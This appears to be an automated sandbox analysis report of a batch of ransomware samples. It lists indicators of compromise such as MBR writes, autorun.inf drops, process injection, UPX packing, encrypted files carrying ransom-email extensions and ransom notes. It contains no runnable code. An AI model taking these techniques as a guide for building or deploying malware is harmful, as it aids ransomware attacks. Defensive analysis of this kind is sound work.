Bootkits write to the MBR to gain persistence at a level below the operating system.
description ioc Process File opened for modification \??\PhysicalDrive0 Trojan-Ransom.Win32.Blocker.mvjg-586cb47c31583a8cd32e6797016106dfbdc0b56554fc4b66d17528580a086835.exe -
AutoIT Executable 1 IoCs
AutoIT scripts compiled to PE executables.
resource yara_rule behavioral1/files/0x0007000000023caa-210.dat autoit_exe -
Drops autorun.inf file 1 TTPs 9 IoCs
Malware can abuse Windows Autorun to spread further via attached volumes.
description ioc Process File opened for modification C:\Users\Admin\Desktop\00417\autorun.inf aspnet_wp.exe File opened for modification C:\Users\Admin\Desktop\00417\autorun.inf cmd.exe File opened for modification \??\c:\autorun.inf cmd.exe File created \??\f:\autorun.inf cmd.exe File opened for modification C:\autorun.inf aspnet_wp.exe File opened for modification F:\autorun.inf aspnet_wp.exe File opened for modification C:\Users\Admin\Desktop\00417\autorun.inf Trojan-Ransom.Win32.Crypren.ahjz-4ebfdf556994b367b8a5f53c8a2caa968a4b04c1c36ce3f0ba4490db8d5b17cb.exe File created \??\c:\autorun.inf cmd.exe File opened for modification \??\f:\autorun.inf cmd.exe -
Hide Artifacts: Hidden Files and Directories 1 TTPs 3 IoCs
pid Process 6268 cmd.exe 7668 cmd.exe 5384 cmd.exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 20 IoCs
pid Process 2572 Trojan-Ransom.Win32.Blocker.mvjg-586cb47c31583a8cd32e6797016106dfbdc0b56554fc4b66d17528580a086835.exe 5600 VHO-Trojan-Ransom.Win32.Blocker.gen-c984ae6d030739b93e6369e49d56ae87265b59b9834e8fca9f16b14c99b76eb4.exe 4712 HEUR-Trojan-Ransom.MSIL.Purgen.gen-43ab6c590a6bff566f43a945f13b01ef939932ead64e8ab1eed4a98abe5aa4c7.exe 4712 HEUR-Trojan-Ransom.MSIL.Purgen.gen-43ab6c590a6bff566f43a945f13b01ef939932ead64e8ab1eed4a98abe5aa4c7.exe 4712 HEUR-Trojan-Ransom.MSIL.Purgen.gen-43ab6c590a6bff566f43a945f13b01ef939932ead64e8ab1eed4a98abe5aa4c7.exe 4712 HEUR-Trojan-Ransom.MSIL.Purgen.gen-43ab6c590a6bff566f43a945f13b01ef939932ead64e8ab1eed4a98abe5aa4c7.exe 4712 HEUR-Trojan-Ransom.MSIL.Purgen.gen-43ab6c590a6bff566f43a945f13b01ef939932ead64e8ab1eed4a98abe5aa4c7.exe 4712 HEUR-Trojan-Ransom.MSIL.Purgen.gen-43ab6c590a6bff566f43a945f13b01ef939932ead64e8ab1eed4a98abe5aa4c7.exe 4712 HEUR-Trojan-Ransom.MSIL.Purgen.gen-43ab6c590a6bff566f43a945f13b01ef939932ead64e8ab1eed4a98abe5aa4c7.exe 4712 HEUR-Trojan-Ransom.MSIL.Purgen.gen-43ab6c590a6bff566f43a945f13b01ef939932ead64e8ab1eed4a98abe5aa4c7.exe 4712 HEUR-Trojan-Ransom.MSIL.Purgen.gen-43ab6c590a6bff566f43a945f13b01ef939932ead64e8ab1eed4a98abe5aa4c7.exe 4712 HEUR-Trojan-Ransom.MSIL.Purgen.gen-43ab6c590a6bff566f43a945f13b01ef939932ead64e8ab1eed4a98abe5aa4c7.exe 4712 HEUR-Trojan-Ransom.MSIL.Purgen.gen-43ab6c590a6bff566f43a945f13b01ef939932ead64e8ab1eed4a98abe5aa4c7.exe 4712 HEUR-Trojan-Ransom.MSIL.Purgen.gen-43ab6c590a6bff566f43a945f13b01ef939932ead64e8ab1eed4a98abe5aa4c7.exe 7376 HEUR-Trojan-Ransom.MSIL.Makop.gen-5027107312399d069da14d080c632352db49ba011ff800c0fe0f535b4342b9c0.exe 7376 HEUR-Trojan-Ransom.MSIL.Makop.gen-5027107312399d069da14d080c632352db49ba011ff800c0fe0f535b4342b9c0.exe 7376 HEUR-Trojan-Ransom.MSIL.Makop.gen-5027107312399d069da14d080c632352db49ba011ff800c0fe0f535b4342b9c0.exe 7376 HEUR-Trojan-Ransom.MSIL.Makop.gen-5027107312399d069da14d080c632352db49ba011ff800c0fe0f535b4342b9c0.exe 7376 HEUR-Trojan-Ransom.MSIL.Makop.gen-5027107312399d069da14d080c632352db49ba011ff800c0fe0f535b4342b9c0.exe 7376 HEUR-Trojan-Ransom.MSIL.Makop.gen-5027107312399d069da14d080c632352db49ba011ff800c0fe0f535b4342b9c0.exe -
Suspicious use of SetThreadContext 3 IoCs
description pid Process procid_target PID 4712 set thread context of 5960 4712 HEUR-Trojan-Ransom.MSIL.Purgen.gen-43ab6c590a6bff566f43a945f13b01ef939932ead64e8ab1eed4a98abe5aa4c7.exe 177 PID 7412 set thread context of 7696 7412 HostSystem.exe 322 PID 3304 set thread context of 7376 3304 HEUR-Trojan-Ransom.MSIL.Makop.gen-5027107312399d069da14d080c632352db49ba011ff800c0fe0f535b4342b9c0.exe 337 -
resource yara_rule behavioral1/files/0x0007000000023ca8-200.dat upx behavioral1/memory/3388-209-0x0000000000460000-0x00000000005A2000-memory.dmp upx behavioral1/memory/3388-408-0x0000000000460000-0x00000000005A2000-memory.dmp upx behavioral1/files/0x000700000002458f-17922.dat upx behavioral1/memory/6856-18279-0x00000000004B0000-0x00000000008B4000-memory.dmp upx behavioral1/memory/6856-18296-0x0000000072DD0000-0x000000007309F000-memory.dmp upx behavioral1/memory/6856-18309-0x0000000072BB0000-0x0000000072BD4000-memory.dmp upx behavioral1/memory/6856-18311-0x0000000072A10000-0x0000000072A98000-memory.dmp upx behavioral1/memory/6856-18310-0x0000000072AA0000-0x0000000072BAA000-memory.dmp upx behavioral1/memory/6856-18308-0x0000000072BE0000-0x0000000072C29000-memory.dmp upx behavioral1/memory/6856-18307-0x0000000072C30000-0x0000000072CFE000-memory.dmp upx behavioral1/memory/6856-18306-0x0000000072D00000-0x0000000072DC8000-memory.dmp upx behavioral1/memory/6856-20448-0x00000000004B0000-0x00000000008B4000-memory.dmp upx behavioral1/memory/6856-22257-0x00000000004B0000-0x00000000008B4000-memory.dmp upx behavioral1/memory/3320-22264-0x0000000072A90000-0x0000000072B18000-memory.dmp upx behavioral1/memory/3320-22265-0x0000000072DD0000-0x000000007309F000-memory.dmp upx behavioral1/memory/3320-22263-0x0000000072B20000-0x0000000072C2A000-memory.dmp upx behavioral1/memory/3320-22262-0x0000000074D00000-0x0000000074D24000-memory.dmp upx behavioral1/memory/3320-22261-0x0000000074D30000-0x0000000074D79000-memory.dmp upx behavioral1/memory/3320-22260-0x0000000072C30000-0x0000000072CFE000-memory.dmp upx behavioral1/memory/3320-22259-0x0000000072D00000-0x0000000072DC8000-memory.dmp upx behavioral1/memory/3320-22258-0x00000000004B0000-0x00000000008B4000-memory.dmp upx behavioral1/memory/5804-22269-0x0000000072DD0000-0x000000007309F000-memory.dmp upx behavioral1/memory/5804-22271-0x0000000072C30000-0x0000000072CFE000-memory.dmp upx behavioral1/memory/5804-22270-0x0000000072D00000-0x0000000072DC8000-memory.dmp upx behavioral1/memory/5804-22275-0x0000000072A90000-0x0000000072B18000-memory.dmp upx behavioral1/memory/5804-22274-0x0000000072B20000-0x0000000072C2A000-memory.dmp upx behavioral1/memory/5804-22273-0x0000000074D00000-0x0000000074D24000-memory.dmp upx behavioral1/memory/5804-22285-0x0000000072DD0000-0x000000007309F000-memory.dmp upx behavioral1/memory/5804-22291-0x0000000072A90000-0x0000000072B18000-memory.dmp upx behavioral1/memory/5804-22290-0x0000000072B20000-0x0000000072C2A000-memory.dmp upx behavioral1/memory/5804-22289-0x0000000074D00000-0x0000000074D24000-memory.dmp upx behavioral1/memory/5804-22288-0x0000000074D30000-0x0000000074D79000-memory.dmp upx behavioral1/memory/5804-22287-0x0000000072C30000-0x0000000072CFE000-memory.dmp upx behavioral1/memory/5804-22286-0x0000000072D00000-0x0000000072DC8000-memory.dmp upx behavioral1/memory/5804-22284-0x00000000004B0000-0x00000000008B4000-memory.dmp upx behavioral1/memory/5804-22272-0x0000000074D30000-0x0000000074D79000-memory.dmp upx behavioral1/memory/5804-22268-0x00000000004B0000-0x00000000008B4000-memory.dmp upx behavioral1/memory/3320-22297-0x00000000004B0000-0x00000000008B4000-memory.dmp upx behavioral1/memory/3320-22298-0x0000000072D00000-0x0000000072DC8000-memory.dmp upx behavioral1/memory/3320-22299-0x0000000072C30000-0x0000000072CFE000-memory.dmp upx behavioral1/memory/3320-22300-0x0000000074D00000-0x0000000074D24000-memory.dmp upx behavioral1/memory/3320-22310-0x0000000072DD0000-0x000000007309F000-memory.dmp upx behavioral1/memory/3320-25259-0x00000000004B0000-0x00000000008B4000-memory.dmp upx behavioral1/memory/7660-25277-0x00000000004B0000-0x00000000008B4000-memory.dmp upx behavioral1/memory/7660-25307-0x0000000074D00000-0x0000000074D24000-memory.dmp upx behavioral1/memory/7660-25306-0x0000000074D30000-0x0000000074D79000-memory.dmp upx behavioral1/memory/7660-25305-0x0000000072C30000-0x0000000072CFE000-memory.dmp upx behavioral1/memory/7660-25304-0x0000000072D00000-0x0000000072DC8000-memory.dmp upx behavioral1/memory/7660-25303-0x0000000072DD0000-0x000000007309F000-memory.dmp upx behavioral1/memory/7660-25309-0x0000000072B20000-0x0000000072C2A000-memory.dmp upx behavioral1/memory/7660-25341-0x0000000072A90000-0x0000000072B18000-memory.dmp upx behavioral1/memory/7660-28205-0x00000000004B0000-0x00000000008B4000-memory.dmp upx behavioral1/memory/7660-28212-0x0000000072C30000-0x0000000072CFE000-memory.dmp upx behavioral1/memory/7660-28211-0x0000000072D00000-0x0000000072DC8000-memory.dmp upx behavioral1/memory/7660-28210-0x0000000072DD0000-0x000000007309F000-memory.dmp upx -
Drops file in Program Files directory 64 IoCs
description ioc Process File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer\js\nls\ro-ro\WERE_MY _FILES.txt aspnet_wp.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.WindowsFeedbackHub_1.1907.3152.0_x64__8wekyb3d8bbwe\Assets\Folder.png aspnet_wp.exe File opened for modification C:\Program Files\dotnet\shared\Microsoft.WindowsDesktop.App\7.0.16\ru\UIAutomationClient.resources.dll aspnet_wp.exe File opened for modification C:\Program Files\dotnet\shared\Microsoft.WindowsDesktop.App\6.0.27\cs\System.Xaml.resources.dll.STAR.Email=[[email protected]]ID=[F1A57932].XINOF HEUR-Trojan-Ransom.Win32.Fonix.vho-65521d807f053b4fabb85185e7cceeae35e8ffb91ba356f385623e88d4f1a414.exe File opened for modification C:\Program Files\dotnet\shared\Microsoft.WindowsDesktop.App\7.0.16\it\WindowsBase.resources.dll.STAR.Email=[[email protected]]ID=[F1A57932].XINOF HEUR-Trojan-Ransom.Win32.Fonix.vho-65521d807f053b4fabb85185e7cceeae35e8ffb91ba356f385623e88d4f1a414.exe File opened for modification C:\Program Files\dotnet\shared\Microsoft.WindowsDesktop.App\6.0.27\System.Security.Cryptography.Pkcs.dll aspnet_wp.exe File opened for modification C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.27\api-ms-win-core-file-l1-2-0.dll.STAR.Email=[[email protected]]ID=[F1A57932].XINOF HEUR-Trojan-Ransom.Win32.Fonix.vho-65521d807f053b4fabb85185e7cceeae35e8ffb91ba356f385623e88d4f1a414.exe File opened for modification C:\Program Files\dotnet\shared\Microsoft.NETCore.App\8.0.2\System.Diagnostics.TextWriterTraceListener.dll.STAR.Email=[[email protected]]ID=[F1A57932].XINOF HEUR-Trojan-Ransom.Win32.Fonix.vho-65521d807f053b4fabb85185e7cceeae35e8ffb91ba356f385623e88d4f1a414.exe File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\ProfessionalR_OEM_Perp-ul-oob.xrm-ms aspnet_wp.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\createpdfupsell-app\js\nls\uk-ua\WERE_MY _FILES.txt aspnet_wp.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.WindowsAlarms_10.1906.2182.0_neutral_split.scale-100_8wekyb3d8bbwe\Assets\WorldClockSmallTile.contrast-black_scale-100.png aspnet_wp.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.People_10.1902.633.0_x64__8wekyb3d8bbwe\Assets\contrast-white\PeopleAppList.targetsize-72_altform-lightunplated.png aspnet_wp.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.0.30251.0_x64__8wekyb3d8bbwe\Assets\contrast-black\AppPackageAppList.targetsize-32_altform-unplated_contrast-black.png aspnet_wp.exe File opened for modification C:\Program Files\Microsoft Office\root\vfs\ProgramFilesX86\Microsoft Office\Office16\DCF\NativeShim.Resources.dll aspnet_wp.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.MicrosoftOfficeHub_18.1903.1152.0_x64__8wekyb3d8bbwe\System.Reflection.Emit.dll aspnet_wp.exe File opened for modification C:\Program Files\VideoLAN\VLC\plugins\access\libfilesystem_plugin.dll aspnet_wp.exe File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\Professional2019R_Grace-ul-oob.xrm-ms aspnet_wp.exe File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\ProjectStdO365R_Subscription-ul-oob.xrm-ms aspnet_wp.exe File opened for modification C:\Program Files\dotnet\shared\Microsoft.WindowsDesktop.App\6.0.27\pt-BR\System.Windows.Forms.Primitives.resources.dll.STAR.Email=[[email protected]]ID=[F1A57932].XINOF HEUR-Trojan-Ransom.Win32.Fonix.vho-65521d807f053b4fabb85185e7cceeae35e8ffb91ba356f385623e88d4f1a414.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.YourPhone_0.19051.7.0_x64__8wekyb3d8bbwe\Assets\AppTiles\AppIcon.targetsize-60_altform-unplated.png aspnet_wp.exe File opened for modification C:\Program Files\Common Files\microsoft shared\ClickToRun\api-ms-win-crt-environment-l1-1-0.dll.Email=[[email protected]]ID=[F1A57932].XINOF HEUR-Trojan-Ransom.Win32.Fonix.vho-65521d807f053b4fabb85185e7cceeae35e8ffb91ba356f385623e88d4f1a414.exe File opened for modification C:\Program Files (x86)\SetupRV HEUR-Trojan-Ransom.Win32.Encoder.gen-57cc7951edcd2b8d3836e7f700955a9ba490bd416a481b9c86c036a55d256954.exe File opened for modification C:\Program Files\7-Zip\Lang\he.txt.STAR.Email=[[email protected]]ID=[F1A57932].XINOF HEUR-Trojan-Ransom.Win32.Fonix.vho-65521d807f053b4fabb85185e7cceeae35e8ffb91ba356f385623e88d4f1a414.exe File opened for modification C:\Program Files\Java\jdk-1.8\jre\legal\jdk\ecc.md aspnet_wp.exe File opened for modification C:\Program Files\dotnet\shared\Microsoft.WindowsDesktop.App\8.0.2\ja\PresentationFramework.resources.dll aspnet_wp.exe File opened for modification C:\Program Files (x86)\SetupRV\autorun\dlls\src\Java\CEJVMTI\CEJVMTI\CEJVMTI.h aspnet_wp.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.WindowsMaps_5.1906.1972.0_neutral_split.scale-100_8wekyb3d8bbwe\Assets\SecondaryTiles\TrafficHub\contrast-white\SmallTile.scale-100.png aspnet_wp.exe File opened for modification C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\images\HxCalendarBadge.scale-400.png aspnet_wp.exe File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\ProfessionalPipcR_Grace-ppd.xrm-ms aspnet_wp.exe File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\ProjectStdCO365R_SubTrial-ul-oob.xrm-ms aspnet_wp.exe File opened for modification C:\Program Files\Microsoft Office\root\Office16\ExcelFloatieXLEditTextModel.bin aspnet_wp.exe File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\WordVL_MAK-ul-oob.xrm-ms aspnet_wp.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-recent-files\js\nls\it-it\ui-strings.js aspnet_wp.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.WindowsMaps_2019.716.2316.0_neutral_~_8wekyb3d8bbwe\AppxSignature.p7x aspnet_wp.exe File opened for modification C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\images\contrast-black\Doughboy.scale-400.png aspnet_wp.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.Windows.Photos_2019.19071.12548.0_x64__8wekyb3d8bbwe\AppCS\Assets\GLTFTextTemplate.json aspnet_wp.exe File opened for modification C:\Program Files\Microsoft Office\root\vfs\ProgramFilesX86\Microsoft Office\Office16\ONBttnIELinkedNotes.dll aspnet_wp.exe File created C:\Program Files\Microsoft Office\root\Document Themes 16\Theme Fonts\WERE_MY _FILES.txt aspnet_wp.exe File opened for modification C:\Program Files\Microsoft Office\root\Document Themes 16\Theme Fonts\Tw Cen MT-Rockwell.xml aspnet_wp.exe File opened for modification C:\Program Files\dotnet\shared\Microsoft.NETCore.App\8.0.2\System.Security.SecureString.dll aspnet_wp.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\win-scrollbar\themes\dark\arrow-right.png aspnet_wp.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.ScreenSketch_10.1907.2471.0_x64__8wekyb3d8bbwe\Assets\ScreenSketchSquare44x44Logo.targetsize-60_altform-lightunplated.png aspnet_wp.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.MicrosoftEdge.Stable_92.0.902.67_neutral__8wekyb3d8bbwe\AppxManifest.xml aspnet_wp.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.0.30251.0_x64__8wekyb3d8bbwe\Assets\Shield.targetsize-44.png aspnet_wp.exe File opened for modification C:\Program Files\Microsoft Office\root\Office16\1033\Client2019_eula.txt aspnet_wp.exe File opened for modification C:\Program Files\dotnet\shared\Microsoft.NETCore.App\8.0.2\System.Web.dll aspnet_wp.exe File opened for modification C:\Program Files\dotnet\shared\Microsoft.NETCore.App\7.0.16\System.Globalization.Calendars.dll aspnet_wp.exe File opened for modification C:\Program Files\dotnet\shared\Microsoft.WindowsDesktop.App\6.0.27\ko\System.Windows.Controls.Ribbon.resources.dll aspnet_wp.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-recent-files\js\nls\pl-pl\ui-strings.js aspnet_wp.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.XboxApp_48.49.31001.0_x64__8wekyb3d8bbwe\_Resources\14.rsrc aspnet_wp.exe File opened for modification C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\images\ContactPhoto.scale-180.png aspnet_wp.exe File opened for modification C:\Program Files\WindowsApps\DeletedAllUserPackages\Microsoft.WindowsMaps_5.1906.1972.0_neutral_split.scale-125_8wekyb3d8bbwe\Assets\SecondaryTiles\TrafficHub\contrast-white\WideTile.scale-125.png aspnet_wp.exe File opened for modification C:\Program Files\Microsoft Office\root\Office16\LogoImages\WinWordLogoSmall.contrast-white_scale-140.png aspnet_wp.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\app\dev\nls\WERE_MY _FILES.txt aspnet_wp.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.XboxApp_48.49.31001.0_x64__8wekyb3d8bbwe\Assets\GamesXboxHubAppList.targetsize-96_altform-unplated_contrast-white.png aspnet_wp.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.WindowsSoundRecorder_10.1906.1972.0_x64__8wekyb3d8bbwe\Assets\VoiceRecorderStoreLogo.contrast-black_scale-100.png aspnet_wp.exe File opened for modification C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\images\contrast-black\HxCalendarSplashLogo.scale-400.png aspnet_wp.exe File opened for modification C:\Program Files\Java\jdk-1.8\bin\idlj.exe aspnet_wp.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\combinepdf\js\nls\ro-ro\WERE_MY _FILES.txt aspnet_wp.exe File opened for modification C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\images\temporary_multiselect_24.png aspnet_wp.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.WindowsCamera_2018.826.98.0_x64__8wekyb3d8bbwe\Assets\WindowsIcons\WindowsCameraAppList.targetsize-36_altform-unplated_contrast-white.png aspnet_wp.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer\js\nls\pt-br\WERE_MY _FILES.txt aspnet_wp.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.WindowsMaps_5.1906.1972.0_neutral_split.scale-100_8wekyb3d8bbwe\Assets\SecondaryTiles\Car\RTL\contrast-white\MedTile.scale-100.png aspnet_wp.exe File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\VisioProR_Grace-ppd.xrm-ms aspnet_wp.exe -
Drops file in Windows directory 1 IoCs
description ioc Process File created C:\Windows\IME\AdvancedEventCleaner.exe UDS-Trojan-Ransom.Win32.Gen.vyw-78853ae45dc992cf465f9d101db3649311bbd1d11d60d63d12d5cdf1794c734a.exe -
Launches sc.exe 3 IoCs
Sc.exe is a Windows utlilty to control services on the system.
pid Process 6940 sc.exe 6860 sc.exe 8068 sc.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Event Triggered Execution: Netsh Helper DLL 1 TTPs 39 IoCs
Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.
description ioc Process Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe -
Program crash 7 IoCs
pid pid_target Process procid_target 1616 4168 WerFault.exe 110 388 692 WerFault.exe 123 5372 5288 WerFault.exe 157 5636 4712 WerFault.exe 108 7928 3492 WerFault.exe 109 7576 3492 WerFault.exe 109 4492 4432 WerFault.exe 153 -
System Location Discovery: System Language Discovery 1 TTPs 41 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language UDS-Trojan-Ransom.Win32.Encoder-37942f7c03a7895189861f7dede0844b359baa7aab0651ac0f2700b0d576a678.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 2.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Trojan-Ransom.Win32.Blocker.mvjg-586cb47c31583a8cd32e6797016106dfbdc0b56554fc4b66d17528580a086835.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language timeout.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language timeout.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language HostSystem.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language UDS-Trojan-Ransom.Win32.Locky-6ef270bce6969e01839651ba78e2f9dbfbbfebce95478497e07e9386214b977d.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language TORBUILD.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language TORBUILD.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language mshta.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Setup-Siemens.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Trojan-Ransom.Win32.Blocker.mexm-ce45c43092d500d0aa3a23aa20faacebbc45ee13a99f48efaca6d80c1528e5b2.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Trojan-Ransom.Win32.Gen.znw-184a6995706e71b75a539af48cb11c75a73dd33fed1793cc2cb4696ca46b96cc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Trojan-Ransom.Win32.Encoder.led-95c6cb345c9e45e2a898ea92458edda33c0c685bc92602f004756ccc0c984f44.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language timeout.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language HEUR-Trojan-Ransom.MSIL.Crypren.gen-3ccc016464e41de7be959c3b00bda1296eee1c50a2897e05c1abbc9034b23027.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language HEUR-Trojan-Ransom.Win32.Locky.gen-70320b438e8e14c531d6a889ef743ffe47c3d71e088316ff7b18269b6ed7ce81.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 123.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language TunnelBear_Installer.sfx.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language aspnet_wp.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language HostSystem.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language HEUR-Trojan-Ransom.MSIL.Makop.gen-5027107312399d069da14d080c632352db49ba011ff800c0fe0f535b4342b9c0.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language HEUR-Trojan-Ransom.MSIL.Blocker.gen-c83f6f4d1ab5f7d04cff339f90501abdbce3736476d747fb77dc2c9332c5ed39.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language TORBUILD.exe Key opened 